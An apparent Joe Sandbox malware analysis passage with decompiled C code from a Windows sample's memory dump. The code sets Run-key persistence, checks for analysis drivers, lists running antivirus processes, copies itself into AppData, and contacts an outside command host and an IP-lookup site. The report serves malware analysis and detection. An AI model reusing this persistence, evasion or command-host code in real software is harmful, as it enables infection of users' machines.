				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfe72a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xfe72a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0FE67D70( &_a136);
				return _t44;
			}

APIs

lstrcpyW.KERNEL32 ref: 0FE643E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE643E9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FE64555
wsprintfW.USER32 ref: 0FE6456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0FE64586

Strings

n, xrefs: 0FE644D5
o, xrefs: 0FE644DD
r, xrefs: 0FE644BD
h, xrefs: 0FE6445D
r, xrefs: 0FE6449D
l, xrefs: 0FE644FD
r, xrefs: 0FE64495
w, xrefs: 0FE6447D
o, xrefs: 0FE644CD
w, xrefs: 0FE644F5
d, xrefs: 0FE644ED
c, xrefs: 0FE644AD
t, xrefs: 0FE6448D
j, xrefs: 0FE644A5
t, xrefs: 0FE64465
{USERID}, xrefs: 0FE643BF, 0FE6440D, 0FE64413
., xrefs: 0FE64535
s, xrefs: 0FE6446D
-, xrefs: 0FE6450D
/, xrefs: 0FE64475
w, xrefs: 0FE64485
y, xrefs: 0FE6451D
/, xrefs: 0FE644C5
m, xrefs: 0FE6452D
a, xrefs: 0FE64505
d, xrefs: 0FE644E5
., xrefs: 0FE644B5
a, xrefs: 0FE64515
h, xrefs: 0FE64525
n, xrefs: 0FE6453D

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 2205c7c3dedd5134c25251f5f8823b2ed953a7563fe64fb00f8c276cf95cbdee
Instruction ID: 640348aafecec9bd1ff7372f8dc493d64c17464a6ef50f8e412d5b90a2e169b5
Opcode Fuzzy Hash: 2205c7c3dedd5134c25251f5f8823b2ed953a7563fe64fb00f8c276cf95cbdee
Instruction Fuzzy Hash: 75418FB0544384CBD720DF11D44932ABFE2FB81B9DF40591CE6880B292DBBA9599CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0FE62960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FE682B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

APIs

lstrlenW.KERNEL32(00520050,00000041,747582B0,00000000), ref: 0FE6299D

Part of subcall function 0FE682B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
Part of subcall function 0FE682B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FE682FB
Part of subcall function 0FE682B0: GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
Part of subcall function 0FE682B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
Part of subcall function 0FE682B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
Part of subcall function 0FE682B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
Part of subcall function 0FE682B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3

RegCreateKeyExW.KERNELBASE(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FE62C45,00000000), ref: 0FE62A84
lstrlenW.KERNEL32(00000000), ref: 0FE62A8F
RegSetValueExW.KERNELBASE(0FE62C45,00520050,00000000,00000001,00000000,00000000), ref: 0FE62AA4
RegCloseKey.KERNELBASE(0FE62C45), ref: 0FE62AB1

Strings

A, xrefs: 0FE6298C
F, xrefs: 0FE629BD
n, xrefs: 0FE62A61
r, xrefs: 0FE62A3E
i, xrefs: 0FE62A5A
f, xrefs: 0FE62A0D
P, xrefs: 0FE6296D
V, xrefs: 0FE62A4C
w, xrefs: 0FE62A29
n, xrefs: 0FE62A76
\, xrefs: 0FE62A30
u, xrefs: 0FE62A37
R, xrefs: 0FE62A68
i, xrefs: 0FE62A1B
W, xrefs: 0FE629C7
\, xrefs: 0FE629EB
n, xrefs: 0FE62A6F
R, xrefs: 0FE629CE
i, xrefs: 0FE629F8
U, xrefs: 0FE62984
r, xrefs: 0FE629FF
s, xrefs: 0FE62A06
r, xrefs: 0FE62A53
n, xrefs: 0FE62A45
e, xrefs: 0FE62A7D
d, xrefs: 0FE62A22
I, xrefs: 0FE62979
H, xrefs: 0FE62993
\, xrefs: 0FE62A14
S, xrefs: 0FE629B0

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 2f702731316032f8709e474ec7341377f7f60bff9f7d227244c6c23a050e739c
Instruction ID: 0bad865e319865c7dc768546f35a3ab8ba0e62014faf445b13f511c664c2a946
Opcode Fuzzy Hash: 2f702731316032f8709e474ec7341377f7f60bff9f7d227244c6c23a050e739c
Instruction Fuzzy Hash: 9D31DCB0D0021DDFEB20CF91E948BEEBFBAFB01749F104119D5187A281D7BA55488F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62D30 Relevance: 57.9, APIs: 19, Strings: 14, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0FE62D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0FE62F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FE62C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FE62D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0FE62F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0FE62F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0FE630A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0FE62AD0(); // executed
				goto L5;
			}

APIs

Part of subcall function 0FE62F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FE62F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FE62E19
LoadCursorW.USER32(00000000,00007F00), ref: 0FE62E2E
LoadIconW.USER32 ref: 0FE62E59
RegisterClassExW.USER32 ref: 0FE62E68
ExitThread.KERNEL32 ref: 0FE62E75

Part of subcall function 0FE62F50: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FE62F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FE62E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FE62E81
CreateWindowExW.USER32 ref: 0FE62EA7
SetWindowLongW.USER32 ref: 0FE62EB4
ExitThread.KERNEL32 ref: 0FE62EBF

Part of subcall function 0FE62F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FE62FA8
Part of subcall function 0FE62F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FE62FCF
Part of subcall function 0FE62F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FE62FE3
Part of subcall function 0FE62F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE62FFA

ExitThread.KERNEL32 ref: 0FE62F3F

Part of subcall function 0FE62AD0: VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0FE62AEA
Part of subcall function 0FE62AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE62B2C
Part of subcall function 0FE62AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FE62B38
Part of subcall function 0FE62AD0: ExitThread.KERNEL32 ref: 0FE62C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FE62EC8
UpdateWindow.USER32(00000000), ref: 0FE62ECF
CreateThread.KERNEL32 ref: 0FE62EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FE62EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FE62F05
TranslateMessage.USER32(?), ref: 0FE62F1C
DispatchMessageW.USER32 ref: 0FE62F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FE62F37

Strings

s, xrefs: 0FE62DB9
firefox, xrefs: 0FE62E9B
k, xrefs: 0FE62D67
s, xrefs: 0FE62D77
f, xrefs: 0FE62DA1
win32app, xrefs: 0FE62E51, 0FE62EA0
0u_w, xrefs: 0FE62EB4
1, xrefs: 0FE62D6F
d, xrefs: 0FE62DA9
s, xrefs: 0FE62DC1
s, xrefs: 0FE62D7F
@_w, xrefs: 0FE62E2E
0, xrefs: 0FE62DF1
w, xrefs: 0FE62DB1

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$0u_w$1$d$f$firefox$k$s$s$s$s$w$win32app$@_w
API String ID: 3011903443-2584465408
Opcode ID: 3d0681a1dc24368b622604ad941a26b4b841d81743e36422f162674fdd7cec42
Instruction ID: 0c0c0c474a471bf9dc364d3dfd46a9f0c3c3d3fdb860e2cc6eee4645d5fdf654
Opcode Fuzzy Hash: 3d0681a1dc24368b622604ad941a26b4b841d81743e36422f162674fdd7cec42
Instruction Fuzzy Hash: 895191B0588309AFE7109F61CC0DB4B7BE4AF45B99F10482DF684BA1C1E7B8A545CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE68050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE68050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FE67E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

APIs

InternetCloseHandle.WININET(?), ref: 0FE68063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FE68082
VirtualAlloc.KERNELBASE(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FE67046,ipv4bot.whatismyipaddress.com,0FE6FF90), ref: 0FE680AF
wsprintfW.USER32 ref: 0FE680C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FE680E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FE6814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0FE68165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FE68184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FE681B0
GetLastError.KERNEL32 ref: 0FE681BC
InternetCloseHandle.WININET(00000000), ref: 0FE681C9
InternetCloseHandle.WININET(00000000), ref: 0FE681CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE67046), ref: 0FE681DA

Strings

a, xrefs: 0FE68139
a, xrefs: 0FE68132
H, xrefs: 0FE680F8
b, xrefs: 0FE68140
o, xrefs: 0FE6812B
s, xrefs: 0FE68101
t, xrefs: 0FE6811D
HTTP/1.1, xrefs: 0FE680D7
a, xrefs: 0FE68124
p, xrefs: 0FE6810F
t, xrefs: 0FE68147
:, xrefs: 0FE68108
l, xrefs: 0FE68116

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 59409d9213efbf7a7975eb8e33af00295f8be632100812ae5e489c8e34ce74a0
Instruction ID: ea7d9102633e513e3ff5d36bc6b886a2b2989dd1960395c19ddcd8bd86ab0b29
Opcode Fuzzy Hash: 59409d9213efbf7a7975eb8e33af00295f8be632100812ae5e489c8e34ce74a0
Instruction Fuzzy Hash: EB417271A4021CBBEB108F52DC48FAE7FB9FF05B95F14411AF914B6281C7B99950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0FE67B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0FE67B8D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FE67C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FE67C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE67C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FE67C4F
lstrcmpiW.KERNEL32(0FE703AC,-00000024), ref: 0FE67C75
Process32NextW.KERNEL32(?,?), ref: 0FE67CEE
GetLastError.KERNEL32 ref: 0FE67CF8
lstrlenW.KERNEL32(00000000), ref: 0FE67D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE67D3B
FindCloseChangeNotification.KERNELBASE(?), ref: 0FE67D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0FE67D55

Strings

iqt, xrefs: 0FE67C75

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: iqt
API String ID: 1411803383-2805759263
Opcode ID: 5a51e74b31b102a132782d6664dda1fa98ee8464925378790e353ff164a44ac3
Instruction ID: 756e71033f37880c59993b8c41d06302028f2b253fcb88d89c20a4b8ef6976fb
Opcode Fuzzy Hash: 5a51e74b31b102a132782d6664dda1fa98ee8464925378790e353ff164a44ac3
Instruction Fuzzy Hash: 9A51AFB1D4021CABCB20CF66D849B9E7FB0FF49BA9F105069E604BB281CB746905CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0FE62AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FE681F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FE682B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FE681F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FE62890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
